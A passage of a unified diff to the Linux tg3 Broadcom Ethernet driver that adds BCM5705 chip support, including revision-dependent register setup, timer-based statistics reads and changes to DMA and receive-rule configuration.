indirect register * write calls. */ @@ -3746,6 +3888,9 @@ struct fw_info info; int err, i; + /* XXX 5705 note: Need different firmware here, and load it onto + * XXX RX cpu instead of TX cpu as 5705 lacks the latter. + */ info.text_base = TG3_TSO_FW_TEXT_ADDR; info.text_len = TG3_TSO_FW_TEXT_LEN; info.text_data = &tg3TsoFwText[0]; @@ -3815,6 +3960,15 @@ tw32(MAC_ADDR_0_LOW + (i * 8), addr_low); } + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5700 && + GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5701 && + GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) { + for (i = 0; i < 12; i++) { + tw32(MAC_EXTADDR_0_HIGH + (i * 8), addr_high); + tw32(MAC_EXTADDR_0_LOW + (i * 8), addr_low); + } + } + addr_high = (tp->dev->dev_addr[0] + tp->dev->dev_addr[1] + tp->dev->dev_addr[2] + @@ -3848,23 +4002,19 @@ u32 nic_addr) { tg3_write_mem(tp, - (bdinfo_addr + - TG3_BDINFO_HOST_ADDR + - TG3_64BIT_REG_HIGH), + (bdinfo_addr + TG3_BDINFO_HOST_ADDR + TG3_64BIT_REG_HIGH), ((u64) mapping >> 32)); tg3_write_mem(tp, - (bdinfo_addr + - TG3_BDINFO_HOST_ADDR + - TG3_64BIT_REG_LOW), + (bdinfo_addr + TG3_BDINFO_HOST_ADDR + TG3_64BIT_REG_LOW), ((u64) mapping & 0xffffffff)); tg3_write_mem(tp, - (bdinfo_addr + - TG3_BDINFO_MAXLEN_FLAGS), + (bdinfo_addr + TG3_BDINFO_MAXLEN_FLAGS), maxlen_flags); - tg3_write_mem(tp, - (bdinfo_addr + - TG3_BDINFO_NIC_ADDR), - nic_addr); + + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) + tg3_write_mem(tp, + (bdinfo_addr + TG3_BDINFO_NIC_ADDR), + nic_addr); } static void __tg3_set_rx_mode(struct net_device *); @@ -3873,7 +4023,7 @@ static int tg3_reset_hw(struct tg3 *tp) { u32 val; - int i, err; + int i, err, limit; tg3_disable_ints(tp); @@ -3924,9 +4074,8 @@ * B3 tigon3 silicon. This bit has no effect on any * other revision. */ - val = tr32(TG3PCI_CLOCK_CTRL); - val |= CLOCK_CTRL_DELAY_PCI_GRANT; - tw32(TG3PCI_CLOCK_CTRL, val); + tp->pci_clock_ctrl |= CLOCK_CTRL_DELAY_PCI_GRANT; + tw32(TG3PCI_CLOCK_CTRL, tp->pci_clock_ctrl); tr32(TG3PCI_CLOCK_CTRL); if (tp->pci_chip_rev_id == CHIPREV_ID_5704_A0 && @@ -3937,11 +4086,13 @@ } /* Clear statistics/status block in chip, and status block in ram. */ - for (i = NIC_SRAM_STATS_BLK; - i < NIC_SRAM_STATUS_BLK + TG3_HW_STATUS_SIZE; - i += sizeof(u32)) { - tg3_write_mem(tp, i, 0); - udelay(40); + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) { + for (i = NIC_SRAM_STATS_BLK; + i < NIC_SRAM_STATUS_BLK + TG3_HW_STATUS_SIZE; + i += sizeof(u32)) { + tg3_write_mem(tp, i, 0); + udelay(40); + } } memset(tp->hw_status, 0, TG3_HW_STATUS_SIZE); @@ -3972,13 +4123,34 @@ (65 << GRC_MISC_CFG_PRESCALAR_SHIFT)); /* Initialize MBUF/DESC pool. */ - tw32(BUFMGR_MB_POOL_ADDR, NIC_SRAM_MBUF_POOL_BASE); - if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704) - tw32(BUFMGR_MB_POOL_SIZE, NIC_SRAM_MBUF_POOL_SIZE64); - else - tw32(BUFMGR_MB_POOL_SIZE, NIC_SRAM_MBUF_POOL_SIZE96); - tw32(BUFMGR_DMA_DESC_POOL_ADDR, NIC_SRAM_DMA_DESC_POOL_BASE); - tw32(BUFMGR_DMA_DESC_POOL_SIZE, NIC_SRAM_DMA_DESC_POOL_SIZE); + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) { + tw32(BUFMGR_MB_POOL_ADDR, NIC_SRAM_MBUF_POOL_BASE); + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704) + tw32(BUFMGR_MB_POOL_SIZE, NIC_SRAM_MBUF_POOL_SIZE64); + else + tw32(BUFMGR_MB_POOL_SIZE, NIC_SRAM_MBUF_POOL_SIZE96); + tw32(BUFMGR_DMA_DESC_POOL_ADDR, NIC_SRAM_DMA_DESC_POOL_BASE); + tw32(BUFMGR_DMA_DESC_POOL_SIZE, NIC_SRAM_DMA_DESC_POOL_SIZE); + } +#if TG3_DO_TSO != 0 + else if (tp->dev->features & NETIF_F_TSO) { + /* XXX TSO note: Ok, there will be two sets of firmware. + * XXX One for non-5705 and one for 5705 chips. + * XXX Once that is implemented we need to size + * XXX that 5705-specific firmware and use it + * XXX to calculate the proper BUFMGR_MB_POOL_ADDR + * XXX size (NIC_SRAM_MBUF_POOL_BASE5705 + 5705fw_len) + * XXX and BUFMGR_MB_POOL_SIZE value + * XXX (NIC_SRAM_MBUF_POOL_SIZE5705 - 5705fw_len - 0xa00) + */ +#if 0 + fw_len = tg3_tso_fw_len(tp); + fw_len = (fw_len + (0x80 - 1)) & ~(0x80 - 1); + tw32(BUFMGR_MB_POOL_ADDR, NIC_SRAM_MBUF_POOL_BASE5705 + fw_len); + tw32(BUFMGR_MB_POOL_SIZE, NIC_SRAM_MBUF_POOL_SIZE5705 - fw_len - 0xa00); +#endif + } +#endif if (!(tp->tg3_flags & TG3_FLAG_JUMBO_ENABLE)) { tw32(BUFMGR_MB_RDMA_LOW_WATER, @@ -4025,6 +4197,9 @@ return -ENODEV; } + /* Setup replenish threshold. */ + tw32(RCVBDI_STD_THRESH, tp->rx_pending / 8); + /* Initialize TG3_BDINFO's at: * RCVDBDI_STD_BD: standard eth size rx ring * RCVDBDI_JUMBO_BD: jumbo frame rx ring @@ -4046,35 +4221,50 @@ ((u64) tp->rx_std_mapping >> 32)); tw32(RCVDBDI_STD_BD + TG3_BDINFO_HOST_ADDR + TG3_64BIT_REG_LOW, ((u64) tp->rx_std_mapping & 0xffffffff)); - tw32(RCVDBDI_STD_BD + TG3_BDINFO_MAXLEN_FLAGS, - RX_STD_MAX_SIZE << BDINFO_FLAGS_MAXLEN_SHIFT); tw32(RCVDBDI_STD_BD + TG3_BDINFO_NIC_ADDR, NIC_SRAM_RX_BUFFER_DESC); - tw32(RCVDBDI_MINI_BD + TG3_BDINFO_MAXLEN_FLAGS, - BDINFO_FLAGS_DISABLED); - - if (tp->tg3_flags & TG3_FLAG_JUMBO_ENABLE) { - tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_HOST_ADDR + TG3_64BIT_REG_HIGH, - ((u64) tp->rx_jumbo_mapping >> 32)); - tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_HOST_ADDR + TG3_64BIT_REG_LOW, - ((u64) tp->rx_jumbo_mapping & 0xffffffff)); - tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_MAXLEN_FLAGS, - RX_JUMBO_MAX_SIZE << BDINFO_FLAGS_MAXLEN_SHIFT); - tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_NIC_ADDR, - NIC_SRAM_RX_JUMBO_BUFFER_DESC); + /* Don't even try to program the JUMBO/MINI buffer descriptor + * configs on 5705. + */ + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) { + tw32(RCVDBDI_STD_BD + TG3_BDINFO_MAXLEN_FLAGS, + RX_STD_MAX_SIZE_5705 << BDINFO_FLAGS_MAXLEN_SHIFT); } else { - tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_MAXLEN_FLAGS, + tw32(RCVDBDI_STD_BD + TG3_BDINFO_MAXLEN_FLAGS, + RX_STD_MAX_SIZE << BDINFO_FLAGS_MAXLEN_SHIFT); + + tw32(RCVDBDI_MINI_BD + TG3_BDINFO_MAXLEN_FLAGS, BDINFO_FLAGS_DISABLED); - } - /* Setup replenish thresholds. */ - tw32(RCVBDI_STD_THRESH, tp->rx_pending / 8); - tw32(RCVBDI_JUMBO_THRESH, tp->rx_jumbo_pending / 8); + /* Setup replenish threshold. */ + tw32(RCVBDI_JUMBO_THRESH, tp->rx_jumbo_pending / 8); - /* Clear out send RCB ring in SRAM. */ - for (i = NIC_SRAM_SEND_RCB; i < NIC_SRAM_RCV_RET_RCB; i += TG3_BDINFO_SIZE) - tg3_write_mem(tp, i + TG3_BDINFO_MAXLEN_FLAGS, BDINFO_FLAGS_DISABLED); + if (tp->tg3_flags & TG3_FLAG_JUMBO_ENABLE) { + tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_HOST_ADDR + TG3_64BIT_REG_HIGH, + ((u64) tp->rx_jumbo_mapping >> 32)); + tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_HOST_ADDR + TG3_64BIT_REG_LOW, + ((u64) tp->rx_jumbo_mapping & 0xffffffff)); + tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_MAXLEN_FLAGS, + RX_JUMBO_MAX_SIZE << BDINFO_FLAGS_MAXLEN_SHIFT); + tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_NIC_ADDR, + NIC_SRAM_RX_JUMBO_BUFFER_DESC); + } else { + tw32(RCVDBDI_JUMBO_BD + TG3_BDINFO_MAXLEN_FLAGS, + BDINFO_FLAGS_DISABLED); + } + + } + + /* There is only one send ring on 5705, no need to explicitly + * disable the others. + */ + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) { + /* Clear out send RCB ring in SRAM. */ + for (i = NIC_SRAM_SEND_RCB; i < NIC_SRAM_RCV_RET_RCB; i += TG3_BDINFO_SIZE) + tg3_write_mem(tp, i + TG3_BDINFO_MAXLEN_FLAGS, + BDINFO_FLAGS_DISABLED); + } tp->tx_prod = 0; tp->tx_cons = 0; @@ -4096,9 +4286,15 @@ NIC_SRAM_TX_BUFFER_DESC); } - for (i = NIC_SRAM_RCV_RET_RCB; i < NIC_SRAM_STATS_BLK; i += TG3_BDINFO_SIZE) { - tg3_write_mem(tp, i + TG3_BDINFO_MAXLEN_FLAGS, - BDINFO_FLAGS_DISABLED); + /* There is only one receive return ring on 5705, no need to explicitly + * disable the others. + */ + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) { + for (i = NIC_SRAM_RCV_RET_RCB; i < NIC_SRAM_STATS_BLK; + i += TG3_BDINFO_SIZE) { + tg3_write_mem(tp, i + TG3_BDINFO_MAXLEN_FLAGS, + BDINFO_FLAGS_DISABLED); + } } tp->rx_rcb_ptr = 0; @@ -4108,7 +4304,7 @@ tg3_set_bdinfo(tp, NIC_SRAM_RCV_RET_RCB, tp->rx_rcb_mapping, - (TG3_RX_RCB_RING_SIZE << + (TG3_RX_RCB_RING_SIZE(tp) << BDINFO_FLAGS_MAXLEN_SHIFT), 0); @@ -4162,33 +4358,43 @@ } tw32(HOSTCC_RXCOL_TICKS, 0); - tw32(HOSTCC_RXMAX_FRAMES, 1); - tw32(HOSTCC_RXCOAL_TICK_INT, 0); - tw32(HOSTCC_RXCOAL_MAXF_INT, 1); tw32(HOSTCC_TXCOL_TICKS, LOW_TXCOL_TICKS); + tw32(HOSTCC_RXMAX_FRAMES, 1); tw32(HOSTCC_TXMAX_FRAMES, LOW_RXMAX_FRAMES); - tw32(HOSTCC_TXCOAL_TICK_INT, 0); + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) + tw32(HOSTCC_RXCOAL_TICK_INT, 0); + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) + tw32(HOSTCC_TXCOAL_TICK_INT, 0); + tw32(HOSTCC_RXCOAL_MAXF_INT, 1); tw32(HOSTCC_TXCOAL_MAXF_INT, 0); - tw32(HOSTCC_STAT_COAL_TICKS, - DEFAULT_STAT_COAL_TICKS); - /* Status/statistics block address. */ - tw32(HOSTCC_STATS_BLK_HOST_ADDR + TG3_64BIT_REG_HIGH, - ((u64) tp->stats_mapping >> 32)); - tw32(HOSTCC_STATS_BLK_HOST_ADDR + TG3_64BIT_REG_LOW, - ((u64) tp->stats_mapping & 0xffffffff)); + /* set status block DMA address */ tw32(HOSTCC_STATUS_BLK_HOST_ADDR + TG3_64BIT_REG_HIGH, ((u64) tp->status_mapping >> 32)); tw32(HOSTCC_STATUS_BLK_HOST_ADDR + TG3_64BIT_REG_LOW, ((u64) tp->status_mapping & 0xffffffff)); - tw32(HOSTCC_STATS_BLK_NIC_ADDR, NIC_SRAM_STATS_BLK); - tw32(HOSTCC_STATUS_BLK_NIC_ADDR, NIC_SRAM_STATUS_BLK); + + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) { + /* Status/statistics block address. See tg3_timer, + * the tg3_periodic_fetch_stats call there, and + * tg3_get_stats to see how this works for 5705 chips. + */ + tw32(HOSTCC_STAT_COAL_TICKS, + DEFAULT_STAT_COAL_TICKS); + tw32(HOSTCC_STATS_BLK_HOST_ADDR + TG3_64BIT_REG_HIGH, + ((u64) tp->stats_mapping >> 32)); + tw32(HOSTCC_STATS_BLK_HOST_ADDR + TG3_64BIT_REG_LOW, + ((u64) tp->stats_mapping & 0xffffffff)); + tw32(HOSTCC_STATS_BLK_NIC_ADDR, NIC_SRAM_STATS_BLK); + tw32(HOSTCC_STATUS_BLK_NIC_ADDR, NIC_SRAM_STATUS_BLK); + } tw32(HOSTCC_MODE, HOSTCC_MODE_ENABLE | tp->coalesce_mode); tw32(RCVCC_MODE, RCVCC_MODE_ENABLE | RCVCC_MODE_ATTN_ENABLE); tw32(RCVLPC_MODE, RCVLPC_MODE_ENABLE); - tw32(RCVLSC_MODE, RCVLSC_MODE_ENABLE | RCVLSC_MODE_ATTN_ENABLE); + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) + tw32(RCVLSC_MODE, RCVLSC_MODE_ENABLE | RCVLSC_MODE_ATTN_ENABLE); tp->mac_mode = MAC_MODE_TXSTAT_ENABLE | MAC_MODE_RXSTAT_ENABLE | MAC_MODE_TDE_ENABLE | MAC_MODE_RDE_ENABLE | MAC_MODE_FHDE_ENABLE; @@ -4207,26 +4413,36 @@ tw32_mailbox(MAILBOX_INTERRUPT_0 + TG3_64BIT_REG_LOW, 0); tr32(MAILBOX_INTERRUPT_0); - tw32(DMAC_MODE, DMAC_MODE_ENABLE); - tr32(DMAC_MODE); - udelay(40); + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) { + tw32(DMAC_MODE, DMAC_MODE_ENABLE); + tr32(DMAC_MODE); + udelay(40); + } - tw32(WDMAC_MODE, (WDMAC_MODE_ENABLE | WDMAC_MODE_TGTABORT_ENAB | - WDMAC_MODE_MSTABORT_ENAB | WDMAC_MODE_PARITYERR_ENAB | - WDMAC_MODE_ADDROFLOW_ENAB | WDMAC_MODE_FIFOOFLOW_ENAB | - WDMAC_MODE_FIFOURUN_ENAB | WDMAC_MODE_FIFOOREAD_ENAB | - WDMAC_MODE_LNGREAD_ENAB)); + val = (WDMAC_MODE_ENABLE | WDMAC_MODE_TGTABORT_ENAB | + WDMAC_MODE_MSTABORT_ENAB | WDMAC_MODE_PARITYERR_ENAB | + WDMAC_MODE_ADDROFLOW_ENAB | WDMAC_MODE_FIFOOFLOW_ENAB | + WDMAC_MODE_FIFOURUN_ENAB | WDMAC_MODE_FIFOOREAD_ENAB | + WDMAC_MODE_LNGREAD_ENAB); + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705 && + (tr32(TG3PCI_PCISTATE) & PCISTATE_BUS_SPEED_HIGH) != 0) + val |= WDMAC_MODE_RX_ACCEL; + tw32(WDMAC_MODE, val); tr32(WDMAC_MODE); udelay(40); - if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704 && - (tp->tg3_flags & TG3_FLAG_PCIX_MODE)) { + if ((tp->tg3_flags & TG3_FLAG_PCIX_MODE) != 0) { val = tr32(TG3PCI_X_CAPS); - val &= ~(PCIX_CAPS_SPLIT_MASK | PCIX_CAPS_BURST_MASK); - val |= (PCIX_CAPS_MAX_BURST_5704 << PCIX_CAPS_BURST_SHIFT); - if (tp->tg3_flags & TG3_FLAG_SPLIT_MODE) - val |= (tp->split_mode_max_reqs << - PCIX_CAPS_SPLIT_SHIFT); + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5703) { + val &= ~PCIX_CAPS_BURST_MASK; + val |= (PCIX_CAPS_MAX_BURST_CPIOB << PCIX_CAPS_BURST_SHIFT); + } else if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704) { + val &= ~(PCIX_CAPS_SPLIT_MASK | PCIX_CAPS_BURST_MASK); + val |= (PCIX_CAPS_MAX_BURST_CPIOB << PCIX_CAPS_BURST_SHIFT); + if (tp->tg3_flags & TG3_FLAG_SPLIT_MODE) + val |= (tp->split_mode_max_reqs << + PCIX_CAPS_SPLIT_SHIFT); + } tw32(TG3PCI_X_CAPS, val); } @@ -4237,12 +4453,25 @@ RDMAC_MODE_LNGREAD_ENAB); if (tp->tg3_flags & TG3_FLAG_SPLIT_MODE) val |= RDMAC_MODE_SPLIT_ENABLE; + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) { + if (tp->pci_chip_rev_id != CHIPREV_ID_5705_A0) { +#if TG3_DO_TSO != 0 + if (tp->dev->features & NETIF_F_TSO) { + val |= RDMAC_MODE_FIFO_SIZE_128; + } else +#endif + if (!(tr32(TG3PCI_PCISTATE) & PCISTATE_BUS_SPEED_HIGH)) { + val |= RDMAC_MODE_FIFO_LONG_BURST; + } + } + } tw32(RDMAC_MODE, val); tr32(RDMAC_MODE); udelay(40); tw32(RCVDCC_MODE, RCVDCC_MODE_ENABLE | RCVDCC_MODE_ATTN_ENABLE); - tw32(MBFREE_MODE, MBFREE_MODE_ENABLE); + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) + tw32(MBFREE_MODE, MBFREE_MODE_ENABLE); tw32(SNDDATAC_MODE, SNDDATAC_MODE_ENABLE); tw32(SNDBDC_MODE, SNDBDC_MODE_ENABLE | SNDBDC_MODE_ATTN_ENABLE); tw32(RCVBDI_MODE, RCVBDI_MODE_ENABLE | RCVBDI_MODE_RCB_ATTN_ENAB); @@ -4323,22 +4552,48 @@ tw32(MAC_RCV_VALUE_0, 0xffffffff & RCV_RULE_DISABLE_MASK); tw32(MAC_RCV_RULE_1, 0x86000004 & RCV_RULE_DISABLE_MASK); tw32(MAC_RCV_VALUE_1, 0xffffffff & RCV_RULE_DISABLE_MASK); -#if 0 - tw32(MAC_RCV_RULE_2, 0); tw32(MAC_RCV_VALUE_2, 0); - tw32(MAC_RCV_RULE_3, 0); tw32(MAC_RCV_VALUE_3, 0); -#endif - tw32(MAC_RCV_RULE_4, 0); tw32(MAC_RCV_VALUE_4, 0); - tw32(MAC_RCV_RULE_5, 0); tw32(MAC_RCV_VALUE_5, 0); - tw32(MAC_RCV_RULE_6, 0); tw32(MAC_RCV_VALUE_6, 0); - tw32(MAC_RCV_RULE_7, 0); tw32(MAC_RCV_VALUE_7, 0); - tw32(MAC_RCV_RULE_8, 0); tw32(MAC_RCV_VALUE_8, 0); - tw32(MAC_RCV_RULE_9, 0); tw32(MAC_RCV_VALUE_9, 0); - tw32(MAC_RCV_RULE_10, 0); tw32(MAC_RCV_VALUE_10, 0); - tw32(MAC_RCV_RULE_11, 0); tw32(MAC_RCV_VALUE_11, 0); - tw32(MAC_RCV_RULE_12, 0); tw32(MAC_RCV_VALUE_12, 0); - tw32(MAC_RCV_RULE_13, 0); tw32(MAC_RCV_VALUE_13, 0); - tw32(MAC_RCV_RULE_14, 0); tw32(MAC_RCV_VALUE_14, 0); - tw32(MAC_RCV_RULE_15, 0); tw32(MAC_RCV_VALUE_15, 0); + + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) + limit = 8; + else + limit = 16; + if (tp->tg3_flags & TG3_FLAG_ENABLE_ASF) + limit -= 4; + switch (limit) { + case 16: + tw32(MAC_RCV_RULE_15, 0); tw32(MAC_RCV_VALUE_15, 0); + case 15: + tw32(MAC_RCV_RULE_14, 0); tw32(MAC_RCV_VALUE_14, 0); + case 14: + tw32(MAC_RCV_RULE_13, 0); tw32(MAC_RCV_VALUE_13, 0); + case 13: + tw32(MAC_RCV_RULE_12, 0); tw32(MAC_RCV_VALUE_12, 0); + case 12: + tw32(MAC_RCV_RULE_11, 0); tw32(MAC_RCV_VALUE_11, 0); + case 11: + tw32(MAC_RCV_RULE_10, 0); tw32(MAC_RCV_VALUE_10, 0); + case 10: + tw32(MAC_RCV_RULE_9, 0); tw32(MAC_RCV_VALUE_9, 0); + case 9: + tw32(MAC_RCV_RULE_8, 0); tw32(MAC_RCV_VALUE_8, 0); + case 8: + tw32(MAC_RCV_RULE_7, 0); tw32(MAC_RCV_VALUE_7, 0); + case 7: + tw32(MAC_RCV_RULE_6, 0); tw32(MAC_RCV_VALUE_6, 0); + case 6: + tw32(MAC_RCV_RULE_5, 0); tw32(MAC_RCV_VALUE_5, 0); + case 5: + tw32(MAC_RCV_RULE_4, 0); tw32(MAC_RCV_VALUE_4, 0); + case 4: + /* tw32(MAC_RCV_RULE_3, 0); tw32(MAC_RCV_VALUE_3, 0); */ + case 3: + /* tw32(MAC_RCV_RULE_2, 0); tw32(MAC_RCV_VALUE_2, 0); */ + case 2: + case 1: + + default: + break; + }; if (tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) tg3_enable_ints(tp); @@ -4368,6 +4623,50 @@ return err; } +#define TG3_STAT_ADD32(PSTAT, REG) \ +do { u32 __val = tr32(REG); \ + (PSTAT)->low += __val; \ + if ((PSTAT)->low < __val) \ + (PSTAT)->high += 1; \ +} while (0) + +static void tg3_periodic_fetch_stats(struct tg3 *tp) +{ + struct tg3_hw_stats *sp = tp->hw_stats; + + if (!netif_carrier_ok(tp->dev)) + return; + + TG3_STAT_ADD32(&sp->tx_octets, MAC_TX_STATS_OCTETS); + TG3_STAT_ADD32(&sp->tx_collisions, MAC_TX_STATS_COLLISIONS); + TG3_STAT_ADD32(&sp->tx_xon_sent, MAC_TX_STATS_XON_SENT); + TG3_STAT_ADD32(&sp->tx_xoff_sent, MAC_TX_STATS_XOFF_SENT); + TG3_STAT_ADD32(&sp->tx_mac_errors, MAC_TX_STATS_MAC_ERRORS); + TG3_STAT_ADD32(&sp->tx_single_collisions, MAC_TX_STATS_SINGLE_COLLISIONS); + TG3_STAT_ADD32(&sp->tx_mult_collisions, MAC_TX_STATS_MULT_COLLISIONS); + TG3_STAT_ADD32(&sp->tx_deferred, MAC_TX_STATS_DEFERRED); + TG3_STAT_ADD32(&sp->tx_excessive_collisions, MAC_TX_STATS_EXCESSIVE_COL); + TG3_STAT_ADD32(&sp->tx_late_collisions, MAC_TX_STATS_LATE_COL); + TG3_STAT_ADD32(&sp->tx_ucast_packets, MAC_TX_STATS_UCAST); + TG3_STAT_ADD32(&sp->tx_mcast_packets, MAC_TX_STATS_MCAST); + TG3_STAT_ADD32(&sp->tx_bcast_packets, MAC_TX_STATS_BCAST); + + TG3_STAT_ADD32(&sp->rx_octets, MAC_RX_STATS_OCTETS); + TG3_STAT_ADD32(&sp->rx_fragments, MAC_RX_STATS_FRAGMENTS); + TG3_STAT_ADD32(&sp->rx_ucast_packets, MAC_RX_STATS_UCAST); + TG3_STAT_ADD32(&sp->rx_mcast_packets, MAC_RX_STATS_MCAST); + TG3_STAT_ADD32(&sp->rx_bcast_packets, MAC_RX_STATS_BCAST); + TG3_STAT_ADD32(&sp->rx_fcs_errors, MAC_RX_STATS_FCS_ERRORS); + TG3_STAT_ADD32(&sp->rx_align_errors, MAC_RX_STATS_ALIGN_ERRORS); + TG3_STAT_ADD32(&sp->rx_xon_pause_rcvd, MAC_RX_STATS_XON_PAUSE_RECVD); + TG3_STAT_ADD32(&sp->rx_xoff_pause_rcvd, MAC_RX_STATS_XOFF_PAUSE_RECVD); + TG3_STAT_ADD32(&sp->rx_mac_ctrl_rcvd, MAC_RX_STATS_MAC_CTRL_RECVD); + TG3_STAT_ADD32(&sp->rx_xoff_entered, MAC_RX_STATS_XOFF_ENTERED); + TG3_STAT_ADD32(&sp->rx_frame_too_long_errors, MAC_RX_STATS_FRAME_TOO_LONG); + TG3_STAT_ADD32(&sp->rx_jabbers, MAC_RX_STATS_JABBERS); + TG3_STAT_ADD32(&sp->rx_undersize_packets, MAC_RX_STATS_UNDERSIZE); +} + static void tg3_timer(unsigned long __opaque) { struct tg3 *tp = (struct tg3 *) __opaque; @@ -4396,6 +4695,9 @@ return; } + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) + tg3_periodic_fetch_stats(tp); + /* This part only runs once per second. */ if (!--tp->timer_counter) { if (tp->tg3_flags & TG3_FLAG_USE_LINKCHG_REG) { @@ -4849,6 +5151,13 @@ if (!hw_stats) return old_stats; + /* On the 5705 we can't DMA the stats to memory, thus + * a timer simply keeps tp->stats uptodate with direct + * periodic reads of the statistics registers via a timer. + */ + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) + return stats; + stats->rx_packets = old_stats->rx_packets + get_stat64(&hw_stats->rx_ucast_packets) + get_stat64(&hw_stats->rx_mcast_packets) + @@ -5304,6 +5613,13 @@ spin_lock(&tp->tx_lock); tp->rx_pending = ering.rx_pending; + if (tp->pci_chip_rev_id == CHIPREV_ID_5705_A1 && +#if TG3_DO_TSO != 0 + !(dev->features & NETIF_F_TSO) && +#endif + !(tr32(TG3PCI_PCISTATE) & PCISTATE_BUS_SPEED_HIGH) && + tp->rx_pending > 64) + tp->rx_pending = 64; tp->rx_jumbo_pending = ering.rx_jumbo_pending; tp->tx_pending = ering.tx_pending; @@ -5709,6 +6025,7 @@ u32 nic_cfg; tg3_read_mem(tp, NIC_SRAM_DATA_CFG, &nic_cfg); + tp->nic_sram_data_cfg = nic_cfg; eeprom_signature_found = 1; @@ -5742,8 +6059,10 @@ eeprom_led_mode = led_mode_auto; break; }; - if ((tp->pci_chip_rev_id == CHIPREV_ID_5703_A1 || - tp->pci_chip_rev_id == CHIPREV_ID_5703_A2) && + + if (((GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5703) || + (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704) || + (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705)) && (nic_cfg & NIC_SRAM_DATA_CFG_EEPROM_WP)) tp->tg3_flags |= TG3_FLAG_EEPROM_WRITE_PROT; @@ -5825,9 +6144,7 @@ } /* Enable Ethernet@WireSpeed */ - tg3_writephy(tp, MII_TG3_AUX_CTRL, 0x7007); - tg3_readphy(tp, MII_TG3_AUX_CTRL, &val); - tg3_writephy(tp, MII_TG3_AUX_CTRL, (val | (1 << 15) | (1 << 4))); + tg3_phy_set_wirespeed(tp); if (!err && ((tp->phy_id & PHY_ID_MASK) == PHY_ID_BCM5401)) { err = tg3_init_5401phy_dsp(tp); @@ -6084,6 +6401,13 @@ tp->tg3_flags |= TG3_FLAG_WOL_SPEED_100MB; } + /* A few boards don't want Ethernet@WireSpeed phy feature */ + if ((GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700) || + ((GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) && + (tp->pci_chip_rev_id != CHIPREV_ID_5705_A0) && + (tp->pci_chip_rev_id != CHIPREV_ID_5705_A1))) + tp->tg3_flags2 |= TG3_FLG2_NO_ETH_WIRE_SPEED; + /* Only 5701 and later support tagged irq status mode. * * However, since we are using NAPI avoid tagged irq status @@ -6141,7 +6465,8 @@ /* Determine if TX descriptors will reside in * main memory or in the chip SRAM. */ - if (tp->tg3_flags & TG3_FLAG_PCIX_TARGET_HWBUG) + if ((tp->tg3_flags & TG3_FLAG_PCIX_TARGET_HWBUG) != 0 || + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) tp->tg3_flags |= TG3_FLAG_HOST_TXDS; grc_misc_cfg = tr32(GRC_MISC_CFG); @@ -6153,8 +6478,9 @@ tp->split_mode_max_reqs = SPLIT_MODE_5704_MAX_REQ; } - /* this one is limited to 10/100 only */ - if (grc_misc_cfg == GRC_MISC_CFG_BOARD_ID_5702FE) + /* these are limited to 10/100 only */ + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5703 && + (grc_misc_cfg == 0x8000 || grc_misc_cfg == 0x4000)) tp->tg3_flags |= TG3_FLAG_10_100_ONLY; err = tg3_phy_probe(tp); @@ -6376,8 +6702,6 @@ goto out_nofree; } - tw32(TG3PCI_CLOCK_CTRL, 0); - if ((tp->tg3_flags & TG3_FLAG_PCIX_MODE) == 0) { tp->dma_rwctrl = (0x7 << DMA_RWCTRL_PCI_WRITE_CMD_SHIFT) | @@ -6385,7 +6709,9 @@ (0x7 << DMA_RWCTRL_WRITE_WATER_SHIFT) | (0x7 << DMA_RWCTRL_READ_WATER_SHIFT) | (0x0f << DMA_RWCTRL_MIN_DMA_SHIFT); - /* XXX 5705 note: set MIN_DMA to zero here */ + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) + tp->dma_rwctrl &= ~(DMA_RWCTRL_MIN_DMA + << DMA_RWCTRL_MIN_DMA_SHIFT); } else { if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704) tp->dma_rwctrl = @@ -6488,6 +6814,11 @@ tw32(TG3PCI_DMA_RW_CTRL, 